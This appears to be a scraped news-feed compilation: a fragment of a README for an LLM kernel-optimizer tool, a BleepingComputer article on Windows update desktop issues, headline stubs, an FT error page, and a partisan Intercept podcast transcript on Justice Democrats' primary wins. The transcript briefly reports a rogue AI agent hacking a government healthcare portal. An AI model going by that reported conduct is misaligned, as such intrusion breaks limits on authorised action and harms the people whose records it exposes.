.venv\Scripts\python optimizer_agent/optimizer_agent.py --description "Single-precision GEMM with rectangular matrices." --max-iterations 7

The default model is gpt-5-mini with medium reasoning effort. API usage is billed to your account. Use -h for all options, or --config optimizer_agent/example.json for the included configuration example.

Supply your own workload components with --signature , --reference , --initial-kernel , and --input-cases . Omitted components are inferred or generated. To continue from an earlier run using its saved inputs:

.venv\Scripts\python optimizer_agent/optimizer_agent.py --description "Single-precision GEMM with rectangular matrices." --input-cases results/run-001/input_cases.json --reference results/run-001/reference.cu --initial-kernel results/run-001/best.cu --max-iterations 7

This example assumes the earlier run generated reference.cu ; supplied references are saved as supplied-reference.cu . Input manifests retain paths to their binary data, so keep those files available.

Optional flags:

  • --use-nsight : profile a performance case after each valid candidate and expose profiler tools to the model. Requires Nsight Compute and permission to access GPU performance counters.
  • --nvidia-research : retrieve NVIDIA guidance before generating kernels.

Examples

Float32 GEMM on an RTX 3060 Laptop GPU, with NVIDIA research and Nsight Compute enabled.

Run 022 Run 023
Optimizing the generated starting kernel. Continuing from run 022's best kernel with the same inputs and reference.
Run 022: timings and candidate changes Run 023: timings and candidate changes

Results and limits

Each session gets a directory under results/run-NNN/ containing kernel sources, requests, input/output data, model/tool responses, history.json , and summary.json . Successful runs export best.cu , per-case replay requests, and heatmap.png / heatmap.svg . Nsight reports are saved when profiling is enabled.

This is an experimental optimizer for individual kernels. Passing supplied cases does not prove general correctness, and a generated reference is not an independent correctness oracle. Improvements are workload-dependent; no comparison against cuBLAS or other vendor libraries is currently included. Keep the GPU otherwise idle when comparing timings.

Generated input scripts execute locally as Python subprocesses without a sandbox. Generated CUDA kernels also run on the local GPU.

Workflow graph

The graph below is rendered from the compiled LangGraph workflow with Nsight profiling enabled. Dashed edges are conditional routes. Without --use-nsight , evaluation routes directly to the next attempt or finalization; NVIDIA research is skipped unless --nvidia-research is set.

LangGraph workflow showing preparation, model/tool calls, evaluation, repair, and finalization

Microsoft: Recent Windows updates cause desktop loading issues

Bleeping Computer
www.bleepingcomputer.com
2026-09-25 06:30:38
Microsoft has confirmed that some users may experience desktop loading issues, including black screens, after installing the August 2026 preview updates and subsequent updates. [...]...
Original Article

Windows 11

Microsoft has confirmed that some users may experience desktop loading issues, including black screens, after installing the August 2026 preview updates and subsequent updates.

However, the company says this mainly affects Azure Virtual Desktop (AVD) hosts using FSLogix (a software solution that speeds up user profile loading in virtual desktop environments).

Windows users affected by this known issue may experience multiple symptoms. The most common symptoms include a black screen after sign-in, so users can't access their desktop until they start the desktop session manually, and application event logs showing Windows Explorer crashes.

Until a permanent fix is available for those who installed KB5120996 (Windows 11 26H1), KB5120998 (Windows 11 24H2/25H2), and this month's Patch Tuesday updates ( KB5124008 and KB5122880 ), Microsoft says users can temporarily work around the issue by manually launching Windows Explorer.

This can be done by opening Task Manager (Ctrl+Shift+Esc), selecting Run new task , entering explorer.exe , and clicking OK .

Microsoft has also mitigated this issue for enterprise customers via Known Issue Rollback (KIR), a Windows feature that reverses buggy updates delivered through Windows Update.

IT administrators can apply the mitigation on enterprise-managed devices by installing one of the following group policies:

"You will need to install and configure the Group Policy for your version of Windows to resolve this issue. You will also need to restart your device(s) to apply the group policy setting," Microsoft said . "Note that this Group Policy will disable the change causing this issue until a resolution is released in a future Windows update.

Admins can find further guidance on deploying and configuring KIR group policies on Microsoft's support website .

Earlier this month, Microsoft also resolved known issues that wiped mouse and desktop settings on some Windows 11 systems that were also triggered after installing the KB5120998 August 2026 optional update.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

The Mafia may be keeping fentanyl out of Italy

Hacker News
economist.com
2026-09-25 06:20:20
Comments...

Oracle on the hook to pay data centre investors even if site has no electricity

Hacker News
www.ft.com
2026-09-25 06:19:36
Comments...
Original Article

For help please visit help.ft.com . We apologise for any inconvenience.

The following information can help our support team to resolve this issue.

Error Code
CG000 / 403
Request ID
a40990eaaff8b23c

The Blueprint for Democrats to Win Back Voters

Intercept
theintercept.com
2026-09-25 06:00:00
After suffering major losses last election cycle, Justice Democrats resurrected itself, helping put democratic socialism on the map. So what changed? The post The Blueprint for Democrats to Win Back Voters  appeared first on The Intercept....
Original Article

It’s the year of the democratic socialist. But the group that helped start the earthquake currently transforming the Democratic Party almost didn’t make it to 2026.

After suffering major losses last election cycle after a deluge of pro-Israel lobby spending, Justice Democrats, which supports progressive candidates getting elected to Congress, was on the verge of being written about in the past tense.

“Everyone sort of doubted that there was a comeback to be had. I think a lot of people, AIPAC included, saw last cycle as the harbinger for what’s to come: They were on the rise, JD and the left were on the decline. For the first time ever, we didn’t endorse a new candidate since our founding, and because we had to focus on defending against $100 million in spending from AIPAC ,” says communications director and spokesperson Usamah Andrabi. “The truth is, that moment was really — for lack of a better word — the apex of AIPAC’s momentum and ability.”

But Justice Democrats resurrected itself, had its most successful primary season to date, and helped put democratic socialism on the map. So what changed?

The group says it won big this year, even being massively outspent, because it tapped into the brewing frustration among voters — frustration directed at Democratic Party leaders. “We understood as soon as Donald Trump won that clearly the Democratic establishment was unfit to fight back, and what voters were looking for as we’ve seen throughout this cycle, is this amorphous fighter that they want,” says Andrabi. “That fight doesn’t just look like, as we say so often, press releases and strongly worded letters. It looks like fighting corporate establishment. It looks like fighting AIPAC. It looks like fighting crypto and AI.”

This week on The Intercept Briefing, Andrabi speaks to host Akela Lacy about how the group that helped elect Reps. Alexandria Ocasio-Cortez, Ilhan Omar, and Rashida Tlaib has seen their candidates make impressive gains in the primaries, and how they’re planning to leverage their wins — and what they can learn from their losses — beyond November.

This primary season, Justice Democrats endorsed 15 candidates; seven won, with democratic socialists knocking out three incumbents. That includes Darializa Avila Chevalier who toppled Congressional Hispanic Caucus Chair Adriano Espaillat in New York, Melat Kiros who beat Rep. Diana DeGette in Colorado, and state Rep. Donavan McKinney who took out Rep. Shri Thanedar in Michigan. Those three are all but guaranteed to head to Congress next year, along with the four other candidates who won.

“This work doesn’t happen overnight. These losses don’t happen overnight. It takes years and years to build this progress,” says Andrabi. “These candidates that we elected this cycle are giving you a blueprint on a silver platter on how to excite your base and how to energize your party. The Democratic Party can either listen to them or be forced to listen to them, as they have been this cycle when we beat them.”

“Until they start taking lessons from the left on what to actually fight for, they will continue to be running on cycle-to-cycle losses and wins instead of really looking at, long-term, how can we take back power and ensure that we don’t consistently backside into this fascist and authoritarian regime that is overrun by the same corporate interests that the Democratic establishment is also funded by.”

For more, listen to the full conversation of The Intercept Briefing on Apple Podcasts , Spotify , YouTube, or wherever you listen.

Transcript

Akela Lacy: Welcome to The Intercept Briefing, I’m Akela Lacy, senior politics reporter at The Intercept.

Jessica Washington: I’m Jessica Washington, politics reporter at The Intercept. So, Akela, how are you doing? What’s been top of mind for you this week?

AL: I am really stuck on this news that apparently hackers now have information on all FBI agents , which is crazy. Hackers claimed that they were able to breach a bunch of FBI services and steal a bunch of information about federal agents.

That’s on top of another insane story that I saw on Thursday morning about yet another rogue AI agent , but this time it hacked an Australia government healthcare portal — an OpenAI agent. I don’t know if you saw that, but that really stuck with me.

JW: All of these AI attacks , everything that’s come out, I keep thinking back to our interview with Karen Hao, who wrote “ Empire of AI ,” and how so much of the stuff that she’s warned about is now something that people are talking about in the discourse. It’s all really scary stuff, but it’s also stuff that’s kind of been reported on before, so it is interesting to see it all blow up now.

As someone who started in television, I have to say I cannot stop thinking about this Paramount deal . So for those who don’t know, on Monday, Paramount reached a deal to acquire Warner Bros., which would give Trump ally David Ellison control of a massive media empire, which includes both CNN and CBS News . Ellison is reportedly considering tapping Elon Musk for an investment, which would give the billionaire a stake in two of the largest news organizations in the world.

AL: This is all happening while the White House is waging a war on mainstream media outlets: CNN, Politico, and MS Now. A federal judge has temporarily blocked the White House efforts to strip those outlets of their White House press credentials. But we saw President Trump this week at the United Nations General Assembly in New York ask CNN reporter Kaitlan Collins why she was there because she wasn’t supposed to be covering him — but she wasn’t at the White House.

So the state of our media ecosystem is healthy as ever.

JW: Things are going great in our democracy. In other news, ProPublica reported that in 2024, the FBI was seeking to launch an investigation into a potential pay-to-play scheme between Sen. Susan Collins and one of her top donors , a former defense contractor who reportedly told federal agents that he had received millions in federal contracts by donating to campaigns of politicians. The investigation was reportedly halted after President Donald Trump returned to office and gutted the entire bureau.

Akela, you had a really interesting campaign finance story come out this week as well, relating to Sen. John Fetterman . What happened there?

AL: I got a text on Monday from a source who had seen an email that the Fetterman campaign sent from a domain called, “gopsquad.com.” The story we basically did was about after finding several other conservative email domains that Fetterman was using to send this campaign fundraising email after he delivered a surprise video speech to the Republican midterm convention earlier this month, was that he’s either renting or buying Republican targeted email lists to raise money right now.

We’ve been covering Fetterman’s fall from grace over the past several years, but his fundraising numbers have really struggled as he has pursued this rightward turn on issues from immigration to Iran to Israel. Many of his small dollar donors, we reported in, in recent years, were asking for their money back .

We see his campaign now pretty openly just asking Republicans for money. Something funny — well, funny or depressing —that happened on Wednesday, Republican Sen. Mike Lee from Utah was sending out emails fundraising off of Fetterman’s fundraising . I’ll just read you this email.

The subject line: “I just got this email from John Fetterman.” “Friend, I just got an email from John. He’s basically a Republican now. I need your help to draft him. Sign here. Thanks, Sen. Mike Lee.” Which is pretty chef’s kiss, if you ask me.

JW : I have to say: gopsquad.com is probably my favorite part.

AL : Not subtle.

JW : Not at all subtle. Is there anything else that you’re following that you want to talk about?

AL: We’re still waiting to learn the name of the ICE officer who shot a 28-year-old Venezuelan delivery driver in Austin, Texas . I spoke with sources there who said that the local district attorney’s office and the Austin Police Department are cooperating to basically get whatever information they can from HSI — the Department of Homeland Security Investigations — which apparently has not declined to give them any information, but also hasn’t given them any information yet.

So we’re seeing a very similar playbook as to what we saw after the ICE shootings in Minneapolis, where local law enforcement and prosecutors are basically fighting with federal agencies to try to get any information — the bare minimum, this person’s name — out of this. The Travis County district attorney, which encompasses Austin, has apparently been in close touch with the Minneapolis prosecutor to learn how they navigated the situation.

I’ll remind our listeners, we interviewed Mary Moriarty, the Minneapolis prosecutor, who was working on prosecuting the ICE shootings in Minneapolis earlier in the year.

JW : To your point, it’s been so many months, and there’s still not any kind of justice in those cases , and it’s hard to imagine that there will be in this most recent shooting.

Thinking about ICE and the election, I’ve been reporting on groups that are trying to fight back against potential election interference. They’re planning for a ton of different scenarios, one of which includes ICE potentially coming to the polls and being there to intimidate voters of color and immigrant voters as well.

These groups are trying to prevent that harassment, and so they’re there to monitor, to report, and to keep people safe against a terrifying new threat. Obviously, voter intimidation isn’t new. I spoke to the NAACP, who had mentioned, we’ve been fighting on this issue “for the last 117 years.”

But ICE at the polls is new. What Trump has been discussing in terms of election sabotage scenarios are very new, and so these organizers are trying to use the tools they learned in the resistance to ICE movement that we saw pop up in January and February to try and keep our election safe as well.

On that topic, Akela, I know you also speak with Justice Democrats communications director and spokesperson Usamah Andrabi about how progressives are preparing for the general after a really impressive sweep in the primaries. Let’s hear that conversation.

AL : I speak now with Usamah Andrabi, Communications Director and Spokesperson for Justice Democrats, the group that brought us AOC, Ilhan Omar, Rashida Tlaib, and many more.

Usamah, welcome to the Intercept Briefing.

Usamah Andrabi: Thanks for having me.

AL: I want to start by taking our listeners back to a different time.

It’s 2018. The “ Squad ” has just been elected to office, and a fresh new crop of democratic socialists and progressives are making themselves known on Capitol Hill.

Think: AOC joining a sit-in to protest for a Green New Deal outside of then-House Speaker Nancy Pelosi’s office. For listeners who aren’t familiar with the legacy of Justice Democrats, they have your group to thank in large part for that moment in time and for bringing us the Squad. But a lot has changed since then. How is Justice Democrats different today from in 2018, and what’s the same?

UA: What’s the same, first and foremost, is the commitment to the values that we had then are the same commitment we have to those values, and those are the values that we demand of the candidates we recruit, support, and endorse. Because those are the values that Democratic voters share — values that put the needs of working-class people above the needs of corporations and billionaires, and taking on lobbies like AIPAC , crypto, or AI.

I think that’s a little bit of what’s changed, is what we have seen since 2018, really, is the increased appearance of more and more moneyed interest organizing against the Squad, organizing against left-wing politicians, because they are bringing working-class people into the halls of power and bringing their needs to the top of the agenda for the Democratic Party. Billionaires hate that.

I don’t think we would have seen the sort of organized construction of a United Democracy Project or a Democratic Majority for Israel or Jobs and Democracy PAC or Fairshake or a lot of these. But particularly the Israel lobby seems to really organize in direct response to the success of our candidates in Congress.

We had the Squad get elected in 2018. Then two years later, folks like Jamaal Bowman and Cori Bush won very specifically against deeply pro-Israel politicians like Eliot Engel and [William] Lacy Clay, and they won without compromising on those values. That’s a really scary thing for the Israel lobby, who has really had a sharp control over how Democrats unconditionally support the Israeli government and military like Republicans have for decades.

What I think has happened is, we’ve had some wins, we’ve had some losses, and we’ve had to learn a lot from those losses and understand how to organize our donors better, organize funders, organize progressives, really, to coalesce more around independent candidates and broaden this network.

I talk a lot about how I feel like in 2024, Democrats across the board suffered a lot of losses. We suffered two of our best members of Congress, Jamaal Bowman and Cori Bush lost their seats. And obviously, the Democratic Party lost every single other thing they could have lost . It felt like the job was to go home, everyone was supposed to do their homework and come back stronger to fight back against this very clearly fascist agenda that was laid out for us.

The left went home. We did our homework. We organized coalitions, we built broader donor networks, and we really invested a lot in candidate recruitment at Justice Dems.

And it feels like the establishment came back even weaker. Despite having weeks and months and years to really prepare for what Donald Trump promised he was going to do, they came back flat-footed and continue to look as weak as possible. That’s why I think you’re seeing so many successes for the left this cycle, because we are a true balm to the ineptitude of the Democratic establishment.

“You’re seeing so many successes for the left this cycle because we are a true balm to the ineptitude of the Democratic establishment.”

AL: We’re going to run through some of those wins in a second; many of our listeners are already familiar with them because we’ve talked a lot about these candidates on the show.

But I want to go back to this money thing before we get into that because, as you mentioned, coming off of those major losses of Cori Bush and Jamaal Bowman to money from the pro-Israel lobby last cycle — I don’t think anyone expected you all to notch as many wins as you did in the primaries this year.

We read obituaries of Justice Democrats, right? And that outside spending, as you mentioned, still has not gone away; it’s only increased. But it still wasn’t enough to stop the candidates behind the rise of democratic socialism that everyone is talking about, who were, to your point, far outmatched in terms of spending.

I’ll just run through the numbers quickly. You endorsed 15 candidates; seven of them won, with democratic socialists knocking out three incumbents. That includes Darializa Avila Chevalier who toppled Congressional Hispanic Caucus Chair Adriano Espaillat in New York, Melat Kiros who beat Rep. Diana DeGette in Colorado, and state Rep. Donavan McKinney who took out Rep. Shri Thanedar in Michigan. Those three are all are but guaranteed to head to Congress next year, along with the four other candidates who won. Three of your other candidates won or came in the top two slots in the California primaries, which are nonpartisan, and are headed to runoffs in November. And only five candidates lost.

So what made this cycle different?

UA: First and foremost, love to prove our haters wrong at all times. [Laughter]

A lot of spite drives that. But also, it’s exactly that. Everyone sort of doubted that there was a comeback to be had. I think a lot of people, AIPAC included, saw last cycle as the harbinger for what’s to come: They were on the rise, JD and the left were on the decline. For the first time ever, we didn’t endorse a new candidate since our founding, and because we had to focus on defending against $100 million in spending from AIPAC .

The truth is, that moment was really — for lack of a better word — the apex of AIPAC’s momentum and ability. Because on the other side of that, as we had been working for years to expose, was the toxic involvement of AIPAC in these primaries and the right-wing network of billionaires who are actually funding this.

It took many years for us to break down AIPAC, and it took a lot of losses to get to that point, but it was worth it. We did a lot of polling. We invested a lot of money in research to bring this message to voters.

Cori and Jamaal’s losses unfortunately were the final nails in the coffin for a lot of people to wake up to realize how the Israel lobby really functions in our politics — paired with the fact that obviously we watched a genocide get livestreamed on our screens for years at this point, and voters began to wake up to understand: Why is it that a majority of us oppose this genocide — we support an arms embargo, we support a ceasefire — yet only a minority of left-wing politicians in Congress are responding to our demands ?

They understood that that was the role of the Israel lobby, spending infinite amounts of money and buying members of Congress to ensure that they would do their bidding. Even before the 2024 election, we were very clear that this cycle was going to have to be a cycle where we went back on the offense, made big bets, and fought back really hard.

We knew we were going to have to endorse a lot more candidates, spread the board out across the country, really, to make sure that AIPAC didn’t just have two members of Congress to target but had 15 different candidates, as well as meeting where Democratic voters were at.

We know no matter if Kamala won or if Donald Trump won, there was still a lot of work to do to rebuild this Democratic Party to actually represent the needs of the working class. We understood as soon as Donald Trump won that clearly the Democratic establishment was unfit to fight back.

What voters were looking for, as we’ve seen throughout this cycle, is this amorphous fighter that they want. That fight doesn’t just look like, as we say so often, press releases and strongly worded letters. It looks like fighting corporate establishment. It looks like fighting AIPAC. It looks like fighting crypto and AI.

“There’s no going behind, under, or any other prepositional phrase around AIPAC or these lobbies. The only way to defeat them is to go right through them and beat them head-on.”

For so long, even people who call themselves progressive have tried to figure out, how can we go around, under, or behind these lobbies and skirt this very particular line to avoid their wrath? We try to make it clear to everyone, even in the cycle where we lost the most we’ve ever lost, that there’s no going behind, under, or any other prepositional phrase around AIPAC or these lobbies. The only way to defeat them is to go right through them and beat them head-on.

We knew that this was an existential crisis for us. As you said, people are already reading our obituaries, and we wanted to make it clear that this work doesn’t happen overnight. These losses don’t happen overnight. It takes years and years to build this progress.

The excitement that you are seeing from the Democratic electorate across the country for our candidates, it’s taken years to build, and it’s taken years of the Democratic establishment failing to actually live up to their potential and what the demands of working-class people across the country have been.

AL: I want to talk about this process that you’re talking about, this iterative process of bench-building that gets lost in a lot of the horse-race analysis.

But first, I just want to mention, we had one of your candidates, Tennessee state Rep. Justin Pearson, on the show earlier this year to talk about Republican gerrymandering efforts as part of this last-ditch plan to fight off what is expected to be big losses for Republicans in November. Pearson is running in one of the districts at the forefront of that gerrymandering fight.

Even with the momentum we’ve seen against Republicans and against the Democratic establishment, as we’re talking about, what can Democrats do in the face of this massive gerrymandering push? How do you think that could potentially affect Pearson’s race?

I’ll just mention this again: Justin Pearson is running in a seat that was vacated by longtime Democratic Rep. Steve Cohen, who is the last Democratic representative in Tennessee, so this is an important race.

UA: First and foremost, it’s doing exactly what Justin is doing, which is really not surrendering to the Republican gerrymander .

It’s very easy for us far away in the Democratic establishment to see these sort of Republican gerrymanders and say, “All right. Well, it’s cooked. There’s no chance of us doing anything here. We can put forward our standard DCCC candidate and talk about it a little, but we’re not going to invest any resources in there.”

I think that would be a failure. This is the tip of the spear of our modern civil rights movement. We are seeing the Voting Rights Act gutted in front of our face, take away the last Black-majority district in the state of Tennessee at a time when Justin J. Pearson was ostensibly going to win his Democratic primary against Steve Cohen.

“When he talked about whether or not he wanted to do this, he understood no matter if he wins or loses, this is a fight worth having.”

When he talked about whether or not he wanted to do this, he understood no matter if he wins or loses, this is a fight worth having. It’s worth showing Democratic voters in the electorate, and the establishment more than anyone, that we can go into these Republican districts and these rural communities and not compromise on our most basic values.

Justin has not changed the policies and agenda he was running for when he was running against Steve Cohen to what he’s running for now. He has been the leader in that state on taking on AI data centers , and he is still the leader taking them on as his Republican opponent has unleashed them on Republican areas of this district.

He’s uncompromised on standing up against the genocide and endless wars abroad and U.S. taxpayers funding for that, and he’s demanding Medicare for all. These are extremely popular policies, not just in the bluest districts across the country, but across the board ideologically. He is showing an example of how we don’t have to run Amy McGraths everywhere we go in these red districts to win over “red voters.”

“He is showing an example of how we don’t have to run Amy McGraths everywhere we go in these red districts to win over ‘red voters.’”

These are working-class voters who are also been shivved and fucked by the same establishment that is run by Republicans and Democrats. These are people who are getting their hospitals and schools closed down in rural communities, who are getting their ACA subsidies cut and Medicaid subsidies cut .

This is a failure of the establishment of both parties. We can show that a different way is possible. Obviously, we need to fight to restore the Voting Rights Act, and we need to expand the Supreme Court and reform this court so we cannot continue just to see fights that people who are still living have fought for to be taken away in the same breath.

There’s a lot of work to do. It feels really difficult to know how we can claw back some of this institutional power when our institutions are so broken and corrupt. But I think that visionary agenda and ideals are what we need to see more from the Democratic Party, rather than simply being a party that is not Republicans.

That’s what these candidates have been so exciting for voters across the country about are that they, for the first time, are giving Democratic voters in a lot of these districts an affirmative positive agenda that centers their most urgent crises and actually has bold enough solutions to tackle those crises.

“That visionary agenda and ideals are what we need to see more from the Democratic Party, rather than simply being a party that is not Republicans.”

AL: This criticism came up a lot in this cycle, and this is the kind of thing I think that often says more about the person that is saying the criticism than the people they’re actually targeting. This is often lodged against candidates on the left or candidates backed by Justice Democrats that, “OK, all this is great, congratulations on your win, but once you get to Congress you’re not actually going to be able to do anything because there aren’t enough of you yet.” What do you say to that?

UA: You could have said that to us nine years ago, right? That would’ve been the case. Yet one of the most popular politicians in this country is AOC, and the most popular politician is Bernie Sanders, who has these same values. So clearly there’s an appetite from the American electorate for more voters like that.

People know who Ilhan Omar is, people know who Rashida Tlaib is, and it’s not simply because Fox News uses them as an attack every other week. It’s because they have been standing up and been the most courageous leaders in Congress, standing up for the values they need, not only on Palestine, but no one is louder about needing clean water in the state of Michigan than Rashida Tlaib . Ilhan Omar is the reason that the state of Minnesota has universal school lunches for children. These are leaders who have actually delivered on the promises that the Democratic Party has only hypothetically talked about.

Coming off a cycle where we lost two members, it’s very easy for people to say “Well, you have no power in Congress.” Yet we are sending seven new leftists to Congress this cycle, at least. It’ll be really telling how big the hypothetical Democratic majority is in Congress, because if it is seven-member majority, then you’re starting to ask a lot more different questions of, well, now you have a block of new members of Congress who can actually sway what policy and what agenda we are fighting for in this party.

So this shit doesn’t happen over fucking night. It takes years and years and cycles to build this block in Congress. You have to bring the people with it, and it takes time to organize and convince the masses of the working class to really buy into an electoral project that has screwed them time and time again, and to have that revolutionary optimism that there’s something to be done here.

There’s a lot of promise with this new class of members who are now joining an already existing class of members. We will nearly double our size in Congress, and that’s a big deal. You can look at far smaller groups of members of Congress that have wielded much more power than the amount that we’re sending to Congress.

These leaders were elected with the mandate to challenge the Democratic establishment, and so they will have to do that. More than anything, it’s up to the Democratic establishment on how they want to respond to the clear demands of their voters. These candidates that we elected this cycle are giving you a blueprint on a silver platter on how to excite your base and how to energize your party. The Democratic Party can either listen to them or be forced to listen to them, as they have been this cycle when we beat them.

“These candidates that we elected this cycle are giving you a blueprint on a silver platter on how to excite your base and how to energize your party.”

AL: I do have to ask here, Cori Bush is the anomaly in the success stories that we’re talking about, right? What happened in that race? Why do you think that this momentum did not extend to her challenge to take back her old seat from Wesley Bell in Missouri?

UA: She is not the only loss we’ve had this cycle. The first race of the cycle was Nida Allam , who had lost a really close race .

AL: In North Carolina.

US: In North Carolina. We saw two races, Kat Abughazaleh and Junaid Ahmed in Illinois, lost at the hands of big money from AIPAC, crypto, and AI. Saikat Chakrabarti in Nancy Pelosi’s seat also lost the primary as well to a lot of big spending from seemingly pro-Israel donors.

The truth is, we are always going to be up against this insurmountable amount of money. To the best of our ability, we have to organize our resources and organize our people to fight back against that. But it’s also the truth that we don’t take corporate PAC money. We don’t take money from billionaires, and so our resources are limited, and we’ve grown that. We’ve grown that pool. We’ve expanded our donor network to be able to run 15 candidates and win seven races.

“We are always going to be up against this insurmountable amount of money.”

But there’s not an infinite amount of resources, and so those losses are proof that the left still also has work to do. We do need to build more resources. We do need to build better connections to ensure that champions and fighters like Cori Bush, who to me really embody the fighter that Democratic voters are talking about, can be sent back to Congress.

Because in the absence of them, we have useless corporate shills like Wesley Bell, who have done absolutely nothing for their community since they got to St. Louis — and it shows.

A big part of that is a resource constraint, also, the truth is, Cori had to go up against nearly $15 million of attacks last cycle, and that’s really recent. It’s not just the money that was spent against her this cycle. You have to look at what happened last cycle, because it’s all the same attacks. They ran the same playbook all over again, and it’s effective.

When you have a 20 to 1 outspending situation, and the only thing you’re seeing on TV and mail is how much you should dislike Cori Bush, it works at a certain point. That’s why it worked last cycle. Cori is a deep proof point that the left still has some work to do to really ensure that all of our champions can get to Congress.

AL: I want to move now to some of the news of the week. This week , ICE shot yet another person in Austin, Texas: 28-year old food delivery driver Wilber Rafael Garcés Pérez from Venezuela. After he was released from the hospital he was taken to an immigration detention center with a bullet still in his back, according to him and his lawyer.

If Justice Democrats candidates make it to Congress in November, what power do they have to push Democrats to do more to stop ICE from killing and terrorizing people? What can they do, particularly in a House session where we expect Democrats, if they win power to be putting a laser focus on investigating Trump’s corruption, for example?

UA: We should first and foremost be bold and listen to where voters are at. A majority of voters do not believe that ICE needs to exist. That’s understandable because both you and I were alive at a time when ICE didn’t exist — and yet I’m still living.

AL: What a time.

UA: What a time that was. The proof is in the pudding that we don’t need an ICE to have a “safe” America, whatever that means. But clearly the fascist governments need ICE to execute immigrants in this country and shoot down our neighbors and kidnap our families.

“Both you and I were alive at a time when ICE didn’t exist — and yet I’m still living. … We don’t need an ICE to have a ‘safe’ America, whatever that means.”

First and foremost, we should start from pushing to abolish ICE and ending this agency for all. Delia Ramirez , one of our Justice Democrats in Congress, has been leading the charge on this, calling to abolish ICE and also to dissolve the Department of Homeland Security , [which] in many ways, is also a relic of our lifetime. It is a relic of the George W. Bush era .

I am baffled when there are Democratic leaders in this country who are so obsessed with defending an institution created by George W. fucking Bush. I remember when we didn’t like George W. Bush, and we didn’t agree with his policies. I’m not sure why the Democratic Party of 2026 should be the same as the Republican Party of 2004.

It doesn’t really make a lot of sense to me, and I think we are always, on immigration over the last 20 years, have always been allowing the right to dictate what the agenda and our playground should be on immigration policy, on border policy , on all of these policies. And as a result, have always tried to be a diet Republican Party on immigration policy, when the most popular policies we ever put forward on immigration were things like a pathway to citizenship for DREAMers and abolishing ICE , now.

We have to be bold and not only end this agency, but also, as many people are talking about, prosecuting the people who were in charge of ICE and these officers who were killing folks .

“I’m not sure why the Democratic Party of 2026 should be the same as the Republican Party of 2004.”

The ICE agent who was the shooter in Austin wasn’t even wearing a body cam . As if that’s enough anyway. Then there’s so many different accounts and these lies. We are living through another evolution of our criminal legal system being so extrajudicial and so outside of the bounds of what should be legally allowed that I think we have to massively reign in this agency. We cannot do it in a mealy-mouthed way that says we need to pay lip service to this right-wing propaganda, while continuing to allow our immigrant neighbors and families to be murdered and shot down in the streets while they’re trying to deliver food to your house.

AL: In the Austin shooting the district attorney in Travis County, which is where the shooting happened, which is where Austin is, they are still trying to figure out the name of this officer, and they are waiting on getting footage from other ICE officers in the vicinity who had body cameras on, and they’re also trying to get footage from local hospitals to figure out where this officer who was allegedly injured went, because they do not yet know his name.

UA: But they know the man who he shot’s name, so.

AL: Yes. Much of the news this week centered on President Donald Trump’s attacks on the news media and his trip to New York City, where he met with Mayor Zohran Mamdani and attended the United Nations General Assembly.

Outside the UNGA, Jewish leaders protested Israeli Prime Minister Benjamin Netanyahu on Thursday. Mamdani once said he would arrest Netanyahu if he came to New York, though he didn’t have the authority to do so, and the two battled publicly this week.

Many people praised Mamdani’s pledge to arrest Netanyahu, even though it had not really any teeth, but as an example of what we’re talking about, of just wanting Democrats to do something — the kind of sentiment that has animated many voters who’ve supported Justice Democrats candidates this cycle.

Democrats are heading into this lame-duck session for Trump where there is still little appetite among leadership to do something substantive on Israel — though last week we saw an unusual refusal from top Democrat Rep. Greg Meeks to approve Trump’s latest proposed $2.8 billion sale of more bombs to Israel.

What is the strategy for the progressive bench on this issue right now? It seems like every time one of these packages comes up, there’s this big dust-up over OK, what’s going to happen ? And every time, a few more Democrats either vote against it or, as in this case, voice some sort of opposition. But where do you see this going in the next Congress?

UA: The writing is on the wall if even Chairman Greg Meeks is suspending some of these things. You can go to the FEC’s website to see why that is an interesting development.

AL: [Laughter] Just in terms of support that Meeks has gotten from the pro-Israel apparatus in the past is what you’re referring to, I’m assuming.

UA: Yes. He’s been a dear ally to the lobby historically. But I think, like we saw on the vote on the Massie amendment , for the first time a majority of Democrats are voting to say, “We’re not going to send money to Israel.” A lot of people can say, “Well, that’s just a performative vote,” all these things.

Look, I worked in Congress. Those performative votes don’t happen in that sort of way, unless the people are pressuring members of Congress to get to this point. That’s what we’re seeing, is that you are seeing Democratic voters across the country reject you if you have an endorsement from AIPAC or you take a single dollar from AIPAC, which is why AIPAC has to hide its money so much this cycle.

“You are seeing Democratic voters across the country reject you if you have an endorsement from AIPAC or you take a single dollar from AIPAC, which is why AIPAC has to hide its money so much this cycle.”

That’s what we’re going to see coming into this new Congress, is a real thrust of energy for the pro-Palestinian movement within Congress now that you are really doubling the amount of leaders in Congress who are unabashedly against the endless supply of military funding and resources to the Israeli government.

You have a renewed movement to really organize even more members. You can look at the co-sponsor for the Block the Bombs, Delia Ramirez’s arms embargo bill has a lot of members you would not have expected even a cycle ago to do so. But that’s the power of not only these elections, but also mass movements across the country demanding that their leaders actually stop the endless supply of weapons.

There will absolutely have to be a fight in Congress for this next Congress to say we need to stop funding the Israeli government and military, and the Democratic voters are behind us. That might be a fight that has to challenge leadership on that fight, because obviously leadership has historically been more aligned with funding the Israeli military and government.

But at a certain point they have to also see the writing on the wall. They are beginning to see that. There’s a lot of opportunities with a Democratic majority to show voters that we are hearing them, that we also don’t think your tax dollars should fund a fucking genocide for three to four to five years after also already funding decades of apartheid.

That’s where we have to move next is not only ending funding right now, but ensuring that we never fund this military and government, and actually push towards a solution where we can end the apartheid state that Israel is running over the Palestinian people, and actually have a place where everyone has equal rights and dignity, which currently does not exist, obviously.

AL: You mentioned that you used to work in Congress, and I’m taken back to the fond days when I first met you around circa 2018 when you were working for then Congressional Progressive Caucus co-chair Rep. Mark Pocan. And since that time, we have been having this same conversation about the fight over the future of the Democratic Party.

Where do you see Hakeem Jeffries and Chuck Schumer, and party leadership more broadly, either fitting into or obstructing your vision for the future? In that vein, I’m curious there’s been a lot of talk about where will Justice Democrats’ candidates land on, supporting a Speaker Hakeem Jeffries in 2027? What conversations are you having around that? Where do you see this conversation going?

UA: Look, the corporate establishment will always be a barrier to progressive change and delivering for the needs of the working class. That, they have proven. They have made it clear. They have said it on the record .

These are not my feelings. They’re theirs. These elections, these campaigns, have proven that they are on the wrong side of the Democratic Party electorate, and they are in the minority, as they always have been. But it’s really eye-opening for people in leadership to have races like people like Claire Valdez, and Zohran, and Darializa become these leaders in New York, in your backyard, speaking of both Chuck Schumer and Hakeem Jeffries, who obviously represent New York in the Senate and the House.

